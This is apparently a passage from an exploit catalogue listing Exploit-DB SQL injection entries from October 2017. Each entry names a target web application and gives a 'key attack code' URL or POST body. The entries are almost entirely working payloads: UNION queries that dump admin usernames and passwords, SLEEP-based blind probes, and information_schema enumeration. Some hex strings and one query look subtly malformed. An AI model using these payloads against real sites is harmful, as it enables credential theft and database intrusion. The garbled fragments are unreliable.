    /admin/editadgroup.php?groupid=-++/*!00009UNION*/+/*!00009SELECT*/+0x3,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(select+group_concat(0x557365726e66d653a,name,0x3c62723e,0x5067373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--

2017-10-30 | EDB 43082 | SQL Injection | Difficulty: Low | Risk: High
Name: Protected Links - SQL Injection
Target program / environment: Protected Links / Protected Links
Key attack code:
    POST /index.php HTTP/1.1

    username=' UNION ALL SELECT,CONCAT(VERSiON(),0x49485344e2053454e4344e),3,4,CONCAT(0x49485344e2053454e4344e)--&password=Ver Ayari

2017-10-30 | EDB 4308 | SQL Injection | Difficulty: Medium | Risk: High
Name: AROX School ERP PHP - 'id' SQL Injection
Target program / environment: AROX School ERP PHP / AROX School ERP PHP
Key attack code:
    /office_admin/?pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
2017-10-30 | EDB 43080 | SQL Injection | Difficulty: Medium | Risk: High
Name: Shareet - 'photo' SQL Injection
Target program / environment: Shareet / Shareet
Key attack code:
    /?photo=sasihsirfe' AND SLEEP(5) AND 'DUqs'='DUqs

2017-10-30 | EDB 43079 | SQL Injection | Difficulty: Medium | Risk: High
Name: US Zip Codes Database - 'state' SQL Injection
Target program / environment: US Zip Codes Database / US Zip Codes Database
Key attack code:
    /index.php?action=lookupcounty&state='+/*!08888union*/+/*!08888select*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--

2017-10-30 | EDB 43078 | SQL Injection | Difficulty: Medium | Risk: High
Name: Newspaper 1.0 - SQL Injection
Target program / environment: Newspaper / Newspaper 1.0
Key attack code:
    /admin/admin_process.php?act=editpollform&id=-2'++/*!00022UNION*/+/*!00022SELECT*/+0x3,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x33,0x34,0x35,VerSiOn(),database(),0x38,0x39,0x330,0x33,0x332--

2017-10-30 | EDB 43090 | SQL Injection | Difficulty: Medium | Risk: High
Name: PG All Share Video 1.0 - SQL Injection
Target program / environment: PG All Share Video / PG All Share Video 1.0
Key attack code:
    /channels/category/7' AND (SELECT 4458 FROM(SELECT COUNT(*),CONCAT(0x770626b7,(SELECT (ELT(4458=4458,))),0x77678707,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JBxT'='JBxT